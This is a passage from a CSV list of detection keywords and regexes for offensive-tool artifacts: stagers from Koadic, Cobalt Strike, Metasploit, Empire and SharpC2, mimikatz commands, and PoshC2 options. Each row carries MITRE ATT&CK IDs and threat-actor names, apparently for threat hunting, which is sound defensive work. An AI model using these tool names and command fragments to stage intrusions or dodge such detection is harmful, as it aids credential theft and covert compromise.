T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*stager/js/rundll32_js *",".{0,1000}stager\/js\/rundll32_js\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*stager/js/wmic *",".{0,1000}stager\/js\/wmic\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*stager_bind_pipe*",".{0,1000}stager_bind_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*stager_bind_pipe*",".{0,1000}stager_bind_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*stager_bind_tcp*",".{0,1000}stager_bind_tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*stager_bind_tcp*",".{0,1000}stager_bind_tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*stager_hidden_bind_tcp.asm*",".{0,1000}stager_hidden_bind_tcp\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*stager_reverse_https.bin*",".{0,1000}stager_reverse_https\.bin.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*stager_sock_find.asm*",".{0,1000}stager_sock_find\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*stagers/*/aes.py*",".{0,1000}stagers\/.{0,1000}\/aes\.py.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*stagers/*/diffiehellman.py*",".{0,1000}stagers\/.{0,1000}\/diffiehellman\.py.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*stagers/*/get_sysinfo.py*",".{0,1000}stagers\/.{0,1000}\/get_sysinfo\.py.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*stagers/*/rc4.py*",".{0,1000}stagers\/.{0,1000}\/rc4\.py.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Stagers\ExeStager\*",".{0,1000}Stagers\\ExeStager\\.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Stagers\SvcStager\*",".{0,1000}Stagers\\SvcStager\\.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*stagerx64.bin*",".{0,1000}stagerx64\.bin.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*standard::answer*",".{0,1000}standard\:\:answer.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::base64*",".{0,1000}standard\:\:base64.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::cd*",".{0,1000}standard\:\:cd.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::cls*",".{0,1000}standard\:\:cls.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::coffee*",".{0,1000}standard\:\:coffee.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::exit*",".{0,1000}standard\:\:exit.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::hostname*",".{0,1000}standard\:\:hostname.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::localtime*",".{0,1000}standard\:\:localtime.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::log*",".{0,1000}standard\:\:log.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::sleep*",".{0,1000}standard\:\:sleep.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standard::version*",".{0,1000}standard\:\:version.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*standin --asrep*",".{0,1000}standin\s\-\-asrep.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*standin --dc*",".{0,1000}standin\s\-\-dc.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*standin --delegation*",".{0,1000}standin\s\-\-delegation.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*standin --group *Domain 